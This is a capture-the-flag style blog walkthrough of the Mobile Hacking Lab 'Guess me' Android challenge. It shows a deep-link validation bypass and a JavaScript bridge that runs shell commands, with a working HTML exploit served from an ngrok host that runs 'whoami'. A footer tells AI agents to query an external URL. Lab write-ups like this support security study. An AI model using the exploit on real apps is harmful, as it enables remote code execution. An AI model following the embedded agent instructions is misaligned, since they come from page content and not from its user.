# Guess me

1. Hello everyone , In this blog post , I will try to explain my solution steps for IOT Connect challenge from Mobile Hacking Lab Platform . i hope it will be useful for you
2. Let's install our app then open the application . we found that : it’s a game that have a random number and when you put the right guess you won

   <img src="/files/t4DjJOCnDWT8CfnsTbkw" alt="image.png" width="266">
3. During Analysis the AndroidManifest.xml file we found 2 important Activity : the `MainActivity` and `WebView activity` use ( mhl schema )

   <figure><img src="/files/Uthd9Ls94uob6Mm19lJb" alt="" width="563"><figcaption></figcaption></figure>
4. Let’s Analysis the First one (`MainActivity`) : i found an important method :
   1. `startNewGame()` : First generate a random number (Secret number ) , then Reset the attempt to 0 , display an initial message , then use enable user interact to input text

      <figure><img src="/files/v0Ds5d1wGS2vG27kv5Ph" alt=""><figcaption></figcaption></figure>
   2. `ValidateGuess()` : retrieve the user input then identify if it high or low comparing with the real value , then check if it valid or not , if it success then display congrats message , if it not display fail message

      <figure><img src="/files/AQRCis5IslSGqVYh4jwi" alt=""><figcaption></figcaption></figure>
   3. `enable/disable input ()` : it make user able to input or not
5. Let’s Analysis the Sec one (`WebviewActivity`) : i found an important method :
   1. `oncreate()` : `enable JS` in our app , `add JS Interface` that make the js code interact with the app ,, `android Bridge` is the name that the WebView will use it to interact with the app

      <figure><img src="/files/Gx3qDBr9cfD1abN1IkyQ" alt=""><figcaption></figcaption></figure>
   2. `isValidDeepLink()` : validates URLs based on : URLs with the schemes `mhl` or `https` and the host `mobilehackinglab`. It also checks that the `url` query parameter ends with `"mobilehackinglab.com"`.

      <figure><img src="/files/iAgEmPAQt4qIkLTJp3fQ" alt=""><figcaption></figcaption></figure>
   3. `MyJavaScriptInterface class`
      1. `loadWebsite()` : take the URL and check for it not null then Load it inside the WebView
      2. `getTime()` : take the string and then execute it in the system because it use `Runtime.getRuntime().exec(Time);` ,, then use `Stream` to `read the result of execution` and then `convert the data to txt file`

         <figure><img src="/files/0sCjr9DQ2WsnD5n9H9e9" alt=""><figcaption></figcaption></figure>
6. Let’s test it using adb : `adb shell am start -n com.mobilehackinglab.guessme/.WebviewActivity -d "mhl://mobilehackinglab?url=https://google.com/mobilehackinglab.com"`

   <figure><img src="/files/fXlmFrLsor00qas5H8WO" alt=""><figcaption></figcaption></figure>
7. then we can call the method inside `MyJavaScriptInterface` class and write a malicious JS to call `getTime ()` code contain malicious argument and load it via the deep link from a public server to achieve RCE

   ```jsx
   <!DOCTYPE html>
   <html lang="en">
   <head>
       <meta charset="UTF-8">
       <meta name="viewport" content="width=device-width, initial-scale=1.0">
   </head>
   <body>

   <p id="result">Thank you for visiting</p>

   <!-- Add a hyperlink with onclick event -->
   <a href="#" onclick="executeCommand()">Execute Command</a>

   <script>

       function executeCommand() {
           try {
               var result = AndroidBridge.getTime("whoami");
               var lines = result.split('\\n');
               var timeVisited = lines[0];
               var fullMessage = "Command: " + timeVisited;
               document.getElementById('result').innerText = fullMessage;

               window.location.href = "https://www.mobilehackinglab.com/";
           } catch (e) {
               console.error("Error calling getTime:", e);
           }
       }

   </script>

   </body>
   </html>
   ```
8.

```
<figure><img src="/files/6FqjHXGP2XK8NkHg8rNw" alt=""><figcaption></figcaption></figure>
```

9. let’s use this exploit with adb : `adb shell am start -W -a android.intent.action.VIEW -d "mhl://mobilehackinglab/?url= [https://104a-156-203-231-227.ngrok-free.app/exploit.html?mobilehackinglab.com](https://104a-156-203-231-227.ngrok-free.app/exploit.html?mobilehackinglab.com)"`

   <figure><img src="/files/nFnaeBDvYeBsmjz5WpBr" alt=""><figcaption></figcaption></figure>
10. and here we already execute whoami command and then we get RCE&#x20;


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://kero0x1.gitbook.io/general/mobile-pentest/mobile-hacking-lab/guess-me.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.